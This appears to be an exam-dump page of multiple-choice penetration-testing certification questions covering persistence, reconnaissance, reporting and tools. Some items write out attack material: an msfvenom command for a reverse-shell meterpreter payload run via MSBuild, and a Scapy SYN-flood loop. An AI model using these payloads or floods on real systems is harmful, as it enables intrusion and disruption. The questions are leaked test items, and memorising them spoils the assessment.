Weekend Special Sale Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: buysanta

Exact2Pass Menu

Question # 4

Which of the following post-exploitation activities allows a penetration tester to maintain persistent access in a compromised system?

A.

Creating registry keys

B.

Installing a bind shell

C.

Executing a process injection

D.

Setting up a reverse SSH connection

Full Access
Question # 5

A penetration tester performs an assessment on the target company's Kubernetes cluster using kube-hunter. Which of the following types of vulnerabilities could be detected with the tool?

A.

Network configuration errors in Kubernetes services

B.

Weaknesses and misconfigurations in the Kubernetes cluster

C.

Application deployment issues in Kubernetes

D.

Security vulnerabilities specific to Docker containers

Full Access
Question # 6

A penetration tester gains initial access to a target system by exploiting a recent RCE vulnerability. The patch for the vulnerability will be deployed at the end of the week. Which of the following utilities would allow the tester to reenter the system remotely after the patch has been deployed? (Select two).

A.

schtasks.exe

B.

rundll.exe

C.

cmd.exe

D.

chgusr.exe

E.

sc.exe

F.

netsh.exe

Full Access
Question # 7

A penetration tester is conducting a vulnerability scan. The tester wants to see any vulnerabilities that may be visible from outside of the organization. Which of the following scans should the penetration tester perform?

A.

SAST

B.

Sidecar

C.

Unauthenticated

D.

Host-based

Full Access
Question # 8

A penetration tester is working on an engagement in which a main objective is to collect confidential information that could be used to exfiltrate data and perform a ransomware attack. During the engagement, the tester is able to obtain an internal foothold on the target network. Which of the following is the next task the tester should complete to accomplish the objective?

A.

Initiate a social engineering campaign.

B.

Perform credential dumping.

C.

Compromise an endpoint.

D.

Share enumeration.

Full Access
Question # 9

A penetration tester is testing a power plant's network and needs to avoid disruption to the grid. Which of the following methods is most appropriate to identify vulnerabilities in the network?

A.

Configure a network scanner engine and execute the scan.

B.

Execute a testing framework to validate vulnerabilities on the devices.

C.

Configure a port mirror and review the network traffic.

D.

Run a network mapper tool to get an understanding of the devices.

Full Access
Question # 10

A penetration tester gains access to a host but does not have access to any type of shell. Which of the following is the best way for the tester to further enumerate the host and the environment in which it resides?

A.

ProxyChains

B.

Netcat

C.

PowerShell ISE

D.

Process IDs

Full Access
Question # 11

During a penetration test, a tester attempts to pivot from one Windows 10 system to another Windows system. The penetration tester thinks a local firewall is blocking connections. Which of the following command-line utilities built into Windows is most likely to disable the firewall?

A.

certutil.exe

B.

bitsadmin.exe

C.

msconfig.exe

D.

netsh.exe

Full Access
Question # 12

A penetration tester needs to complete cleanup activities from the testing lead. Which of the following should the tester do to validate that reverse shell payloads are no longer running?

A.

Run scripts to terminate the implant on affected hosts.

B.

Spin down the C2 listeners.

C.

Restore the firewall settings of the original affected hosts.

D.

Exit from C2 listener active sessions.

Full Access
Question # 13

A penetration tester presents the following findings to stakeholders:

Control | Number of findings | Risk | Notes

Encryption | 1 | Low | Weak algorithm noted

Patching | 8 | Medium | Unsupported systems

System hardening | 2 | Low | Baseline drift observed

Secure SDLC | 10 | High | Libraries have vulnerabilities

Password policy | 0 | Low | No exceptions noted

Based on the findings, which of the following recommendations should the tester make? (Select two).

A.

Develop a secure encryption algorithm.

B.

Deploy an asset management system.

C.

Write an SDLC policy.

D.

Implement an SCA tool.

E.

Obtain the latest library version.

F.

Patch the libraries.

Full Access
Question # 14

Given the following statements:

    Implement a web application firewall.

    Upgrade end-of-life operating systems.

    Implement a secure software development life cycle.

In which of the following sections of a penetration test report would the above statements be found?

A.

Executive summary

B.

Attack narrative

C.

Detailed findings

D.

Recommendations

Full Access
Question # 15

During a penetration testing engagement, a tester targets the internet-facing services used by the client. Which of the following describes the type of assessment that should be considered in this scope of work?

A.

Segmentation

B.

Mobile

C.

External

D.

Web

Full Access
Question # 16

After a recent penetration test was conducted by the company's penetration testing team, a systems administrator notices the following in the logs:

2/10/2023 05:50AM C:\users\mgranite\schtasks /query

2/10/2023 05:53AM C:\users\mgranite\schtasks /CREATE /SC DAILY

Which of the following best explains the team's objective?

A.

To enumerate current users

B.

To determine the users' permissions

C.

To view scheduled processes

D.

To create persistence in the network

Full Access
Question # 17

A penetration tester needs to confirm the version number of a client's web application server. Which of the following techniques should the penetration tester use?

A.

SSL certificate inspection

B.

URL spidering

C.

Banner grabbing

D.

Directory brute forcing

Full Access
Question # 18

Which of the following tasks would ensure the key outputs from a penetration test are not lost as part of the cleanup and restoration activities?

A.

Preserving artifacts

B.

Reverting configuration changes

C.

Keeping chain of custody

D.

Exporting credential data

Full Access
Question # 19

A penetration tester would like to leverage a CSRF vulnerability to gather sensitive details from an application's end users. Which of the following tools should the tester use for this task?

A.

Browser Exploitation Framework

B.

Maltego

C.

Metasploit

D.

theHarvester

Full Access
Question # 20

Which of the following OT protocols sends information in cleartext?

A.

TTEthernet

B.

DNP3

C.

Modbus

D.

PROFINET

Full Access
Question # 21

A tester runs an Nmap scan against a Windows server and receives the following results:

Nmap scan report for win_dns.local (10.0.0.5)

Host is up (0.014s latency)

Port State Service

53/tcp open domain

161/tcp open snmp

445/tcp open smb-ds

3389/tcp open rdp

Which of the following TCP ports should be prioritized for using hash-based relays?

A.

53

B.

161

C.

445

D.

3389

Full Access
Question # 22

A penetration tester is getting ready to conduct a vulnerability scan as part of the testing process. The tester will evaluate an environment that consists of a container orchestration cluster. Which of the following tools should the tester use to evaluate the cluster?

A.

Trivy

B.

Nessus

C.

Grype

D.

Kube-hunter

Full Access
Question # 23

A penetration tester wants to check the security awareness of specific workers in the company with targeted attacks. Which of the following attacks should the penetration tester perform?

A.

Phishing

B.

Tailgating

C.

Whaling

D.

Spear phishing

Full Access
Question # 24

A penetration tester has just started a new engagement. The tester is using a framework that breaks the life cycle into 14 components. Which of the following frameworks is the tester using?

A.

OWASP MASVS

B.

OSSTMM

C.

MITRE ATT&CK

D.

CREST

Full Access
Question # 25

A penetration tester assesses a complex web application and wants to explore potential security weaknesses by searching for subdomains that might have existed in the past. Which of the following tools should the penetration tester use?

A.

Censys.io

B.

Shodan

C.

Wayback Machine

D.

SpiderFoot

Full Access
Question # 26

Which of the following is a term used to describe a situation in which a penetration tester bypasses physical access controls and gains access to a facility by entering at the same time as an employee?

A.

Badge cloning

B.

Shoulder surfing

C.

Tailgating

D.

Site survey

Full Access
Question # 27

Which of the following protocols would a penetration tester most likely utilize to exfiltrate data covertly and evade detection?

A.

FTP

B.

HTTPS

C.

SMTP

D.

DNS

Full Access
Question # 28

A penetration testing team wants to conduct DNS lookups for a set of targets provided by the client. The team crafts a Bash script for this task. However, they find a minor error in one line of the script:

1 #!/bin/bash

2 for i in $(cat example.txt); do

3 curl $i

4 done

Which of the following changes should the team make to line 3 of the script?

A.

resolvconf $i

B.

rndc $i

C.

systemd-resolve $i

D.

host $i

Full Access
Question # 29

A penetration tester is evaluating a SCADA system. The tester receives local access to a workstation that is running a single application. While navigating through the application, the tester opens a terminal window and gains access to the underlying operating system. Which of the following attacks is the tester performing?

A.

Kiosk escape

B.

Arbitrary code execution

C.

Process hollowing

D.

Library injection

Full Access
Question # 30

A penetration tester performs a service enumeration process and receives the following result after scanning a server using the Nmap tool:

PORT STATE SERVICE

22/tcp open ssh

25/tcp filtered smtp

111/tcp open rpcbind

2049/tcp open nfs

Based on the output, which of the following services provides the best target for launching an attack?

A.

Database

B.

Remote access

C.

Email

D.

File sharing

Full Access
Question # 31

During a penetration test, a junior tester uses Hunter.io for an assessment and plans to review the information that will be collected. Which of the following describes the information the junior tester will receive from the Hunter.io tool?

A.

A collection of email addresses for the target domain that is available on multiple sources on the internet

B.

DNS records for the target domain and subdomains that could be used to increase the external attack surface

C.

Data breach information about the organization that could be used for additional enumeration

D.

Information from the target's main web page that collects usernames, metadata, and possible data exposures

Full Access
Question # 32

A penetration tester completed OSINT work and needs to identify all subdomains for mydomain.com. Which of the following is the best command for the tester to use?

A.

nslookup mydomain.com » /path/to/results.txt

B.

crunch 1 2 | xargs -n 1 -I 'X' nslookup X.mydomain.com

C.

dig @8.8.8.8 mydomain.com ANY » /path/to/results.txt

D.

cat wordlist.txt | xargs -n 1 -I 'X' dig X.mydomain.com

Full Access
Question # 33

A penetration tester is conducting reconnaissance for an upcoming assessment of a large corporate client. The client authorized spear phishing in the rules of engagement. Which of the following should the tester do first when developing the phishing campaign?

A.

Shoulder surfing

B.

Recon-ng

C.

Social media

D.

Password dumps

Full Access
Question # 34

As part of an engagement, a penetration tester wants to maintain access to a compromised system after rebooting. Which of the following techniques would be best for the tester to use?

A.

Establishing a reverse shell

B.

Executing a process injection attack

C.

Creating a scheduled task

D.

Performing a credential-dumping attack

Full Access
Question # 35

While conducting a reconnaissance activity, a penetration tester extracts the following information:

Emails: - admin@acme.com - sales@acme.com - support@acme.com

Which of the following risks should the tester use to leverage an attack as the next step in the security assessment?

A.

Unauthorized access to the network

B.

Exposure of sensitive servers to the internet

C.

Likelihood of SQL injection attacks

D.

Indication of a data breach in the company

Full Access
Question # 36

A penetration tester is authorized to perform a DoS attack against a host on a network. Given the following input:

ip = IP("192.168.50.2")

tcp = TCP(sport=RandShort(), dport=80, flags="S")

raw = RAW(b"X"*1024)

p = ip/tcp/raw

send(p, loop=1, verbose=0)

Which of the following attack types is most likely being used in the test?

A.

MDK4

B.

Smurf attack

C.

FragAttack

D.

SYN flood

Full Access
Question # 37

A penetration tester has been provided with only the public domain name and must enumerate additional information for the public-facing assets.

INSTRUCTIONS

Select the appropriate answer(s), given the output from each section.

Output 1

Full Access
Question # 38

A penetration tester identifies an exposed corporate directory containing first and last names and phone numbers for employees. Which of the following attack techniques would be the most effective to pursue if the penetration tester wants to compromise user accounts?

A.

Smishing

B.

Impersonation

C.

Tailgating

D.

Whaling

Full Access
Question # 39

A tester plans to perform an attack technique over a compromised host. The tester prepares a payload using the following command:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.12.12.1 LPORT=10112 -f csharp

The tester then takes the shellcode from the msfvenom command and creates a file called evil.xml. Which of the following commands would most likely be used by the tester to continue with the attack on the host?

A.

regsvr32 /s /n /u C:\evil.xml

B.

MSBuild.exe C:\evil.xml

C.

mshta.exe C:\evil.xml

D.

AppInstaller.exe C:\evil.xml

Full Access